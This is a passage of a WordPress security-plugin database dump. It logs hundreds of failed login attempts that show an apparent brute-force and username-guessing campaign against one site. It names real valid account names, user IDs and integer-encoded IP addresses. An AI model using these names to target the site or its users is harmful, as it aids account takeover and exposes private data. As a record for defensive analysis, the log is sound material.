(99753, 1493306311.558494, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1744766569, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99754, 1493306313.866048, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1744766569, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99755, 1493310765.866900, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3157204740, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99756, 1493310999.764996, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3382964636, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99757, 1493311525.004783, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1981193994, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99758, 1493311526.473118, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1981193994, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99759, 1493311668.792487, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 858203606, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99760, 1493311669.978423, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 858203606, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99761, 1493312452.408631, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 637050808, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99762, 1493314252.237300, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 658304580, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99763, 1493314253.536128, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 658304580, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99764, 1493314282.734749, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99765, 1493315296.488150, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99766, 1493315832.945203, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1892043861, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99767, 1493315834.943224, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1892043861, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99768, 1493316187.617921, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 28968311, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99769, 1493316321.758569, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99770, 1493317334.039030, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99771, 1493318369.382876, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99772, 1493318538.194433, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3149676724, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99773, 1493318539.424238, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3149676724, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99774, 1493319386.916395, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99775, 1493320110.126423, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 621184356, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99776, 1493320389.367811, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99777, 1493321404.031064, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99778, 1493322408.295330, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99779, 1493323425.866678, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99780, 1493324421.114489, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99781, 1493324905.890788, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3158086909, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99782, 1493324907.051485, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3158086909, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99783, 1493325432.090606, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99784, 1493326437.463267, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99785, 1493327446.169706, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99786, 1493328325.705197, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3042965342, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99787, 1493328327.291990, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3042965342, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99788, 1493328437.046868, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99789, 1493329429.464384, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99790, 1493330452.647406, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99791, 1493331446.408608, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99792, 1493332454.674997, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99793, 1493338862.609162, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2037978292, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99794, 1493338865.146532, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2037978292, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99795, 1493339268.510022, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3033986906, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99796, 1493339270.207276, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3033986906, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99797, 1493340938.359187, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3412761521, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99798, 1493341348.235406, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1668664551, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99799, 1493341349.524190, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1668664551, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99800, 1493344007.284333, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3110329374, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1');
INSERT INTO `wp_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(99801, 1493344009.286757, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3110329374, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99802, 1493345413.495871, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2985971885, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99803, 1493345415.056605, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2985971885, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99804, 1493351968.903016, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 831636304, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99805, 1493352643.741791, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 702768013, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99806, 1493357447.103721, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 835452949, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99807, 1493357448.359869, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 835452949, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99808, 1493358147.643555, 1, 'loginFailValidUsername', 'julie', 2, 3562253049, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99809, 1493358148.367695, 1, 'loginFailValidUsername', 'julie', 2, 3562253049, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99810, 1493358149.025040, 1, 'loginFailInvalidUsername', 'julie pierrard', 0, 3562253049, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99811, 1493358149.737459, 1, 'loginFailValidUsername', 'pablo', 3, 3562253049, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99812, 1493358150.813316, 1, 'loginFailValidUsername', 'admin', 1, 3562253049, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99813, 1493361722.804791, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 657683608, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99814, 1493361724.352773, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 657683608, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99815, 1493363740.702674, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2978051518, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99816, 1493363742.136053, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2978051518, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99817, 1493364254.670792, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1730630359, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99818, 1493364255.826627, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1730630359, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99819, 1493371651.314233, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1507036977, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99820, 1493371652.577088, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1507036977, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99821, 1493375030.450938, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1816093533, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99822, 1493375031.595245, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1816093533, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99823, 1493375157.830307, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 624429088, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99824, 1493375158.969483, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 624429088, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99825, 1493376484.681008, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1741416040, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99826, 1493376488.984570, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1741416040, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99827, 1493385140.700013, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2970821136, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99828, 1493385142.091386, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2970821136, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99829, 1493385389.831624, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3321281790, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99830, 1493385390.994283, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3321281790, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99831, 1493386238.339897, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2873895206, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99832, 1493389947.630900, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1333959350, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99833, 1493389948.760266, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1333959350, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99834, 1493390429.844275, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1744105710, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99835, 1493390452.902341, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1744105710, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99836, 1493392355.430652, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3182244527, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99837, 1493392356.693479, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3182244527, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99838, 1493397549.913929, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1552456972, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99839, 1493397550.891528, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1552456972, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99840, 1493400611.429800, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3038516965, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99841, 1493400612.960393, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3038516965, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99842, 1493402564.466583, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 691605825, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99843, 1493402565.985790, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 691605825, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99844, 1493404013.136868, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2058018895, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99845, 1493404308.669808, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1598921172, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99846, 1493404309.820609, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1598921172, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99847, 1493404402.376977, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3183809589, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99848, 1493404403.849907, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3183809589, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99849, 1493406998.613961, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3097359640, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99850, 1493406999.998515, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3097359640, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99851, 1493408056.922278, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 628174571, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99852, 1493408057.933638, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 628174571, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99853, 1493409066.997027, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2588503380, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99854, 1493409068.125387, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2588503380, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99855, 1493410002.375944, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 608761984, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99856, 1493412245.380434, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1423703127, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99857, 1493412246.433561, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1423703127, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99858, 1493412844.731184, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2962005175, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99859, 1493412845.849494, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2962005175, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99860, 1493414253.657376, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1405595591, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99861, 1493414254.740541, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1405595591, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99862, 1493416452.559225, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1224509939, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99863, 1493416454.235016, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1224509939, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99864, 1493416523.533757, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 762636327, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99865, 1493416524.802215, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 762636327, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99866, 1493416810.557915, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1549131029, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99867, 1493423641.485081, 1, 'loginFailValidUsername', 'admin', 1, 3188441888, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99868, 1493425785.414661, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3197714889, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99869, 1493426749.353040, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1335024381, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99870, 1493426750.337042, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1335024381, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99871, 1493427777.933105, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2979895540, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99872, 1493428838.330995, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 693585834, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99873, 1493428839.863732, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 693585834, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99874, 1493433332.625813, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3039577960, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99875, 1493436060.374546, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3304677463, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99876, 1493437257.232909, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2995212956, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99877, 1493437260.039374, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2995212956, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99878, 1493439195.454008, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1023584817, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99879, 1493439696.369036, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1430349643, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99880, 1493440366.387893, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1149515385, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99881, 1493496282.333355, 1, 'loginFailValidUsername', 'admin', 1, 3582777388, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99882, 1493562114.733778, 1, 'loginFailValidUsername', 'admin', 1, 3001689384, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99883, 1493585893.810756, 1, 'loginFailInvalidUsername', 'vous', 0, 1137510410, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99884, 1493585895.714882, 1, 'loginFailInvalidUsername', 'training', 0, 1137510410, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99885, 1493585897.525391, 1, 'loginFailInvalidUsername', 'notre', 0, 1137510410, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99886, 1493585899.323028, 1, 'loginFailInvalidUsername', 'pour', 0, 1137510410, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99887, 1493585901.158223, 1, 'loginFailInvalidUsername', 'cross', 0, 1137510410, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99888, 1493585902.978870, 1, 'loginFailInvalidUsername', 'objectifs', 0, 1137510410, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99889, 1493585904.797967, 1, 'loginFailInvalidUsername', 'venez', 0, 1137510410, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99890, 1493585906.633593, 1, 'loginFailInvalidUsername', 'outils', 0, 1137510410, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99891, 1493585908.619351, 1, 'loginFailInvalidUsername', 'professionnel', 0, 1137510410, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99892, 1493585910.447010, 1, 'loginFailInvalidUsername', 'travail', 0, 1137510410, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99893, 1493591700.921902, 1, 'loginFailInvalidUsername', 'namur', 0, 2917961944, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99894, 1493626137.224726, 1, 'loginFailValidUsername', 'admin', 1, 1847862398, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
